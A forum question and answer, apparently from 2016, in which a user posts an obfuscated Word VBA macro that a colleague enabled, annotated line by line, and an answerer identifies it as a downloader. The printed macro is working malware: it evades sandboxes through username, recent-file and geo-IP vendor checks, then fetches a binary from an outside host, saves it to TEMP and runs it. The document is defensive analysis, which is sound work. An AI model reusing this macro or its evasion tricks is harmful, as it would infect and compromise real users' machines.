
Can someone explain what this macro does, please? A user opened the Word document and enabled the macro in it. I haven't seen anything strange yet, such as files being encrypted. I have scanned the computer and found nothing.

word_image

//-------------------------------------------------------------------

' Entry point of the macro. Document_Close is the name Word uses for the
' document-close event, so the chain starts when the user closes the document
' (assumes this code sits in the ThisDocument module -- confirm in the sample).
Public Sub Document_Close()
' Any run-time error, including the ones raised on purpose by DypEq when an
' environment check fails, jumps to the label below and ends the Sub silently:
' no message box and no visible trace for the user.
On Error GoTo pvvXLG
' Run the downloader routine.
NTglSIW
Exit Sub
pvvXLG:
End Sub
' Main routine: environment checks, geo-IP lookup, download, save, execute.
' Every name (object, method, property, URL) is passed through s(), which
' un-shuffles the string literal at run time, and every call goes through
' CallByName so that no method name appears in clear text.
' CallByName call types used here: 1 = VbMethod, 2 = VbGet, 4 = VbLet.
' The decoded values in the comments below were worked out by hand from the
' literals on each line using the algorithm in s().
Public Sub NTglSIW()
Dim GTXXYW As String
Dim ibsUqd As String
' eIEoA = ThisDocument.Application
Set eIEoA = CallByName(ThisDocument, s(58, "tpaAcniolip", 108), 2)
' Sandbox check 1: abort ("Bad username") if Application.UserName = "PSPUBWS".
If CallByName(eIEoA, s(68, "NresUema", 79), 2) = s(36, "SPSWBUP", 48) Then DypEq (s(99, " daBemanresu", 71))
' Sandbox check 2: abort ("Bad history") if Application.RecentFiles.Count < 3,
' i.e. Word looks freshly installed.
If CallByName(CallByName(eIEoA, s(85, "csineeFeRlt", 95), 2), s(17, "tuCno", 27), 2) < 3 Then DypEq (s(63, "dythars Boi", 106))
' dEwGV = CreateObject("WinHttp.WinHttpRequest.5.1")
Set dEwGV = NKccF(s(75, "t.qnH.RWistp1uHt5eintp.Wet", 245))
' Request 1: synchronous GET to https://www.maxmind.com/geoip/v2.1/city/me
' (a public geo-IP service) to learn how the host's public IP is registered.
CallByName dEwGV, s(21, "pOne", 19), 1, s(13, "EGT", 8), s(138, "/tomscgat1m.h2cwm/d/yii:iexp//mt.owev.w/pn", 145), False
' SetRequestHeader "Referer" = https://www.maxmind.com/en/locate-my-ip-address
CallByName dEwGV, s(158, "ueaetdsReterHqSe", 99), 1, s(46, "feerRer", 68), s(343, "tmdmywotodxm/lhcaa-//s.-me:nsdp.tseeniwap/ri-wc", 322)
' SetRequestHeader "User-Agent" = <shuffled value, not expanded in this note>
CallByName dEwGV, s(158, "ueaetdsReterHqSe", 99), 1, s(52, "esUtnegA-r", 29), s(388, "b60iMIiaN/;.  owl0tl. noEdtT5 0MTmsl./e1(dz ei .W)Srp a06;;coi1n", 83)
' Send
CallByName dEwGV, s(15, "dneS", 19), 1
' Abort ("Can't locate IP address") on HTTP Status >= 400.
If CallByName(dEwGV, s(16, "utatSs", 65), 2) >= 400 Then DypEq (s(31, "el atr PCadtIscd' soane", 110))
' GTXXYW = ResponseText of the geo-IP lookup.
GTXXYW = CallByName(dEwGV, s(83, "nxpTestoeseR", 53), 2)
' Sandbox check 3: abort ("Bad ISP:" & name) if the lower-cased response
' contains any entry of the list returned by inwGjsO().
For Each hVzop In inwGjsO
If InStr(LCase(GTXXYW), LCase(hVzop)) <> 0 Then DypEq (s(10, "dSB PaI:", 59) & hVzop)
Next
' Request 2: synchronous GET for the payload. Decoded URL, defanged for
' log and proxy searches: hxxp://edgartorronterasfmx[.]com/cgi/office15[.]bin
CallByName dEwGV, s(21, "pOne", 19), 1, s(13, "EGT", 8), s(87, "5teoexcf.tdrr.gibpgracici:aoso/en/rnfmo1h/ttm/f", 55), False
' Same User-Agent header as in request 1.
CallByName dEwGV, s(158, "ueaetdsReterHqSe", 99), 1, s(52, "esUtnegA-r", 29), s(388, "b60iMIiaN/;.  owl0tl. noEdtT5 0MTmsl./e1(dz ei .W)Srp a06;;coi1n", 83)
CallByName dEwGV, s(15, "dneS", 19), 1
' Abort ("Can't download binary file") on HTTP Status >= 400.
If CallByName(dEwGV, s(16, "utatSs", 65), 2) >= 400 Then DypEq (s(161, "oiewnCnaalrnoy'a tdf  idbl", 185))
' WZxmL = CreateObject("WScript.Shell").Environment("PROCESS")
Set WZxmL = CallByName(NKccF(s(19, "pclhtrWe.iSlS", 17)), s(107, "vtmrnnniEeo", 106), 2, s(15, "EPCSOSR", 68))
' Drop path: %TEMP% & Application.PathSeparator & "tmp6948.tmp"
ibsUqd = WZxmL(s(14, "METP", 39)) & CallByName(eIEoA, s(50, "SprtraheaaoPt", 111), 2) & s(18, "tpm64.mtp98", 17)
' oWaKVom = CreateObject("ADODB.Stream")
Set oWaKVom = NKccF(s(38, "ODAmaertS.BD", 131))
' Stream.Type = 1 (adTypeBinary), then Open.
CallByName oWaKVom, s(7, "epyT", 27), 4, 1
CallByName oWaKVom, s(21, "pOne", 19), 1
' Write the HTTP ResponseBody (the downloaded bytes) into the stream.
CallByName oWaKVom, s(18, "ertWi", 13), 1, CallByName(dEwGV, s(97, "eRndpBesyoos", 89), 2)
' SaveToFile <drop path>, 2 (adSaveCreateOverWrite). knhPKY only discards
' the return value.
knhPKY CallByName(oWaKVom, s(48, "TaloveFeSi", 53), 1, ibsUqd, 2)
' Close the stream.
knhPKY CallByName(oWaKVom, s(48, "elsCo", 43), 1)
' WScript.Shell.Exec <drop path>: the saved file is launched as a new
' process. Evidence to look for on an affected host: the tmp6948.tmp file in
' the user's TEMP folder and a child process started from Word.
knhPKY CallByName(NKccF(s(19, "pclhtrWe.iSlS", 17)), s(18, "exEc", 35), 1, ibsUqd)
End Sub
' Empty Sub that ignores its argument. The callers in NTglSIW wrap
' CallByName(...) in it so the call's return value has somewhere to go.
Public Sub knhPKY(ByVal KhHfp)
End Sub
' Returns the array of names that NTglSIW searches for (case-insensitively)
' in the geo-IP response; a match aborts the macro with "Bad ISP:".
' The first three entries decode to "AMAZON", "ANONYMOUS" and "BITDEFENDER";
' the remaining entries use the same s() shuffle and are not expanded here.
' NOTE(review): the rest look like more security-vendor, hosting and
' data-centre names -- decode each one with s() before relying on that.
Public Function inwGjsO()
inwGjsO = nRnWXq(Array(s(46, "OZAMAN", 11), s(69, "NNSOYOAUM", 22), s(112, "FDBDEEIENRT", 59), s(21, "OLCB TEAU", 97), s(92, "OCT IESSMYCSS", 120), _
s(23, "REVRES", 53), s(160, "NLOORNTHSCSEETI GGO", 93), s(53, "NOMER RCDTI", 85), s(20, "WVTUTAERS", 23), s(62, "RMAHROACTEN I", 138), _
s(69, "YEIEERF", 24), s(12, "EIFCOTRPNO", 27), s(53, "OITRNFTE", 59), s(46, "NZTEHRE", 13), s(49, "OHDETS", 53), s(24, "SGTHION", 30), _
s(12, "EBAWLSEE", 11), s(94, "COISMOTRF", 70), s(22, "CROFNE", 35), s(52, "HS OSVA", 9), s(15, "PFOORPTNIO", 59), s(17, "ESYTIRUC", 63), _
s(53, "LDOCU", 12), s(14, "NAEDCR EATT", 86), s(17, "TNECATADRE", 79), s(97, "ETERACTDAN", 27), s(98, "AETDEIDCD", 56), s(62, ",PETSLE OS", 37), _
s(135, "TOOLEMAARPKCSUCKB", 72), s(79, "TSACEMIM", 23), s(37, "CIMDNERTOR", 69)))
End Function
' Abort helper: raises run-time error number 2 with the given text as its
' description. When reached via Document_Close, that Sub's On Error handler
' catches the error, so a failed check stops the macro without any visible
' message.
Public Sub DypEq(ByVal gokOtzS As String)
Err.Raise Number:=2, Description:=gokOtzS
End Sub
' Wrapper around CreateObject: instantiates the COM object whose ProgID is
' passed in (the callers pass a string decoded by s()) and returns it.
' The extra hop through IXCHMN changes nothing.
Public Function NKccF(ByVal BItPSle As String)
Set NKccF = IXCHMN(CreateObject(BItPSle))
End Function
' Identity function for object references: returns the object it was given.
Public Function IXCHMN(ByVal qrfTD As Object)
Set IXCHMN = qrfTD
End Function
' Identity function for values: returns its argument unchanged (used by
' inwGjsO to pass the Array(...) through).
Public Function nRnWXq(ByVal FprBLin)
nRnWXq = FprBLin
End Function
' String decoder used for every literal in the macro.
'   DSiduK  - start offset (reduced modulo the string length)
'   TMIZAzM - the shuffled string
'   ZEYKFFg - step added to the position after each character
' Starting at (DSiduK Mod Len), it appends the character at the current
' 0-based position, advances by ZEYKFFg modulo the length, and repeats until
' the result is as long as the input. Example worked from this page:
' s(13, "EGT", 8) gives "GET".
' To read the sample safely, re-implement this loop outside Office and feed
' it the literals; there is no need to run the document.
Public Function s(ByVal DSiduK As Integer, ByVal TMIZAzM As String, ByVal ZEYKFFg As Integer) As String
Dim bNDTc As Integer
bNDTc = llGhqz(DSiduK, Len(TMIZAzM))
' s without arguments is the function's own return value being built up.
Do While Len(s) < Len(TMIZAzM)
s = s & fQeBD(TMIZAzM, bNDTc)
bNDTc = llGhqz((bNDTc + ZEYKFFg), Len(TMIZAzM))
Loop
End Function
' Returns the single character of FfvxYfH at 0-based position bNDTc:
' Left() keeps the first bNDTc + 1 characters and Right(..., 1) takes the
' last of them.
Public Function fQeBD(ByVal FfvxYfH As String, ByVal bNDTc As Integer) As String
fQeBD = Right(Left(FfvxYfH, bNDTc + 1), 1)
End Function
' Remainder of VlKeYlp divided by rrBefv, written out with integer
' division (\) instead of the Mod operator.
Public Function llGhqz(ByVal VlKeYlp As Integer, ByVal rrBefv As Integer) As Integer
llGhqz = VlKeYlp - (rrBefv * (VlKeYlp \ rrBefv))
End Function

//-------------------------------------------------------------------

Maarten van Stam
  • Seeing "esUtnegA-r" (reversed "r-AgentUse") and all those undirected things, I would throw it away. Looks part of a farm bot, but I am absolutely not familiar with hacking and such. – Joop Eggen Sep 19 '16 at 06:21

1 Answer


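It's just a downloader. It downloads a file from a particular URL and then launches it. Before downloading, it checks the Word user name, the number of recent files and a geo-IP lookup of the machine's address, and it quits silently if any of those checks fails. That file is unavailable at the moment, so that's all I can tell.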